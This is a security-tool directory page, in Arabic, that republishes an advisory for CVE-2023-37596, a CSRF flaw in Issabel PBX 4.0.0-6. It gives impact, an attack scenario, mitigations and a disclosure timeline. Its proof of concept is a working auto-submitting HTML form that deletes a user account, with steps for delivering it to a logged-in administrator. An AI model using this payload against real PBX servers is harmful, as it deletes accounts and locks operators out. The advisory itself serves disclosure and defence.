Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-37596 — CVE-2023-37596 هي ثغرة تزوير الطلبات عبر المواقع (CSRF) تم اكتشافها في Issabel PBX الإصدار 4.0.0-6، وهي منصة اتصالات موحدة مفتوحة المصدر واسعة الاستخدام. | Kitploit
أدوات/GitHubGitHub/sahiloj/cve-2023-37596
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubsahiloj/cve-2023-37596

CVE-2023-37596

CVE-2023-37596 هي ثغرة تزوير الطلبات عبر المواقع (CSRF) تم اكتشافها في Issabel PBX الإصدار 4.0.0-6، وهي منصة اتصالات موحدة مفتوحة المصدر واسعة الاستخدام.

عرض المستودع
111منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-37596 — issabel-pbx 4.0.0-6: تزوير الطلبات عبر المواقع (CSRF) — حذف أي مستخدم

الخطورة: عالية  |  CVSS v3.1: 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H)  |  CWE: CWE-352


جدول المحتويات

  • نظرة عامة
  • تفاصيل الثغرة
  • الأثر
  • الإصدار المتأثر
  • سيناريو الهجوم
  • إثبات المفهوم (خطوات إعادة الإنتاج)
  • التخفيف / المعالجة
  • المراجع
  • الجدول الزمني للإفصاح
  • المؤلف

نظرة عامة

تم اكتشاف ثغرة تزوير الطلبات عبر المواقع (CSRF) في Issabel PBX الإصدار 4.0.0-6. لا تطبّق نقطة نهاية إدارة المستخدمين أي حماية من CSRF، مما يسمح لمهاجم عن بُعد غير مصادَق بتجهيز صفحة ويب خبيثة — عند زيارتها من قِبل مسؤول Issabel مصادَق — تحذف أي حساب مستخدم من النظام بصمت. يمكن أن يؤدي الاستغلال المتكرر إلى جعل التطبيق بالكامل غير قابل للوصول عن طريق إزالة جميع المستخدمين الإداريين.


تفاصيل الثغرة

الحقلالقيمة
معرّف CVECVE-2023-37596
نوع الثغرةCross-Site Request Forgery (CSRF)
CWECWE-352
المنتجIssabel PBX
الإصدار المتأثر4.0.0-6
الصفحة الرئيسية للبائعhttps://www.issabel.org/
مستودع البرنامجhttps://github.com/IssabelFoundation/issabelPBX
تم الاختبار علىWindows
تاريخ نشر CVE10/07/2023
اكتشفهاSahil Ojha

الأثر

نظرًا لأن Issabel PBX لا يتحقق من مصدر الطلبات التي تغيّر الحالة الموجهة إلى واجهة إدارة المستخدمين، فإن هجوم CSRF ناجحًا يسمح للمهاجم بـ:

  • حذف أي حساب مستخدم — بما في ذلك المسؤول الرئيسي — دون علم الضحية.
  • التسبب في رفض الخدمة (DoS) — بإزالة جميع المستخدمين، لن يتمكن أي شخص من تسجيل الدخول، مما يجعل لوحة إدارة PBX غير قابلة للوصول تمامًا.
  • تعطيل خدمات الهاتف — يصبح تكوين نظام الهاتف وإدارته غير متاحين حتى يتم استرداد الحساب يدويًا على مستوى الخادم.

الإصدار المتأثر

المنتجالإصدار المتأثرالحالة
issabel-pbx4.0.0-6عرضة للخطر

سيناريو الهجوم

يستضيف المهاجم صفحة HTML خبيثة تحتوي على طلب HTTP مُزوَّر يستهدف نقطة نهاية حذف المستخدم في تطبيق Issabel PBX. يتم تشغيل الهجوم تلقائيًا (أو عند النقر على زر) عندما يزور مستخدم مصادَق بالفعل في Issabel الصفحة الخبيثة في نفس المتصفح. نظرًا لأن المتصفح يضمّن تلقائيًا ملفات تعريف ارتباط الجلسة الخاصة بالضحية مع كل طلب، يقبل الخادم طلب الحذف المُزوَّر باعتباره مشروعًا.

لا تتطلب أي امتيازات خاصة من جانب المهاجم — فقط ناقل هندسة اجتماعية (رابط تصيّد، إعلان خبيث، إلخ) لإغراء المسؤول المصادَق لزيارة الصفحة المُجهزة.

الخصائص الرئيسية لهذا الهجوم:

  • لا يتطلب مصادقة من جانب المهاجم.
  • نقرة واحدة (أو حتى صفر نقرات إذا تم استخدام `` / نماذج الإرسال التلقائي) كافية لتشغيل الاستغلال.
  • يمكن استهداف أي معرّف مستخدم (مثل id=1, id=2, …) عن طريق تعديل الحمولة.
  • الهجوم غير مرئي للضحية؛ يمكن للصفحة عرض محتوى غير ذي صلة مع إرسال الطلب المُزوَّر بصمت.

إثبات المفهوم (خطوات إعادة الإنتاج)

المتطلبات الأساسية

  • Burp Suite (الإصدار المجتمعي أو الاحترافي)
  • متصفح مُهيأ لتوجيه حركة المرور عبر Burp Suite
  • نسخة Issabel PBX 4.0.0-6 يمكن الوصول إليها على الشبكة

الخطوة 1 — تسجيل الدخول كمسؤول

انتقل إلى صفحة قائمة مستخدمي Issabel PBX وسجّل الدخول ببيانات اعتماد المسؤول:

root@kitploit:~
https://<Issabel-IP>/index.php?menu=userlist

الخطوة 1 — قائمة مستخدمي Issabel PBX


الخطوة 2 — التقاط طلب حذف المستخدم في Burp Suite

  1. مع تفعيل بروكسي Burp Suite، انقر على زر Delete بجوار المستخدم المستهدف.
  2. في Proxy → HTTP history داخل Burp Suite، حدد موقع طلب DELETE/POST الملتقط.
  3. انقر بزر الماوس الأيمن على الطلب واختر Engagement Tools → Generate CSRF PoC.

الخطوة 2 — التقاط طلب الحذف في Burp Suite


الخطوة 3 — إنشاء وحفظ استغلال CSRF

سينشئ Burp Suite صفحة HTML مشابهة للصفحة أدناه. احفظها كملف .html (مثل csrf_exploit.html):

root@kitploit:~
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://<Issabel-IP>/index.php?menu=userlist" method="POST">
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Auto-submit the form as soon as the page loads
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

ملاحظة: استبدل <Issabel-IP> بعنوان IP أو اسم مضيف الخادم المستهدف، واضبط قيمة id لاستهداف حساب مستخدم مختلف.


الخطوة 4 — تسليم الاستغلال إلى المسؤول المصادَق

أرسل ملف csrf_exploit.html (أو رابطًا إلى مكان استضافته) إلى مستخدم مسجّل الدخول حاليًا في Issabel PBX. عندما يفتح الضحية الصفحة، يتم إرسال النموذج تلقائيًا ويتم حذف المستخدم المستهدف دون أي مطالبة تأكيد.

الخطوة 4 — تم تنفيذ استغلال CSRF وحذف المستخدم

الخطوة 4 — تأكيد إزالة المستخدم


التخفيف / المعالجة

يجب على البائع و/أو مسؤولي النظام تطبيق الدفاعات التالية لمعالجة هذه الثغرة:

  1. تنفيذ رموز CSRF — إنشاء رمز عشوائي تشفيريًا، لكل جلسة (أو لكل طلب)، والتحقق منه على جانب الخادم لكل طلب يغيّر الحالة. يجب رفض الطلبات التي لا تحمل رمزًا صالحًا.

  2. خاصية SameSite لملفات تعريف الارتباط — اضبط خاصية SameSite لملف تعريف ارتباط الجلسة على Strict أو Lax لمنع الطلبات عبر الأصول من حمل ملف تعريف ارتباط الجلسة في معظم المتصفحات.

  3. التحقق من ترويسة Origin / Referer — على جانب الخادم، ارفض أي طلب يغيّر الحالة لا تطابق ترويسة Origin أو Referer الخاصة به نطاق التطبيق نفسه.

  4. طلب إعادة المصادقة للإجراءات التدميرية — مطالبة المستخدم بإعادة إدخال كلمة المرور قبل معالجة الإجراءات غير القابلة للتراجع مثل حذف حسابات المستخدمين.

  5. تطبيق مبدأ الامتياز الأقل — ضمان أن المستخدمين الذين لديهم دور مسؤول صريح فقط يمكنهم الوصول إلى وظيفة حذف المستخدمين، مما يقلل من نطاق تأثير الهجوم الناجح.

حتى يتوفر تصحيح من البائع، يُنصح المسؤولون بـ:

  • تقييد الوصول إلى لوحة إدارة Issabel PBX بعناوين IP موثوقة عبر قواعد جدار الحماية.
  • تجنب تصفح المواقع غير الموثوقة أثناء تسجيل الدخول إلى لوحة الإدارة.

المراجع

  • NVD — CVE-2023-37596
  • OWASP — تزوير الطلبات عبر المواقع (CSRF)
  • CWE-352: تزوير الطلبات عبر المواقع (CSRF)
  • الموقع الرسمي لـ Issabel PBX
  • IssabelFoundation/issabelPBX على GitHub
  • PortSwigger — CSRF

الجدول الزمني للإفصاح

التاريخالحدث
10/07/2023تم اكتشاف الثغرة والإبلاغ عنها
10/07/2023تم تعيين CVE-2023-37596

المؤلف

Sahil Ojha

  • باحث أمني
  • CVE: CVE-2023-37596

إخلاء مسؤولية: تم نشر هذا المستودع للأغراض التعليمية والإفصاح المسؤول فقط. يجب عدم استخدام المعلومات الواردة هنا لمهاجمة الأنظمة دون إذن كتابي صريح من مالك النظام. لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام لهذه المعلومات.

تنزيل الأداة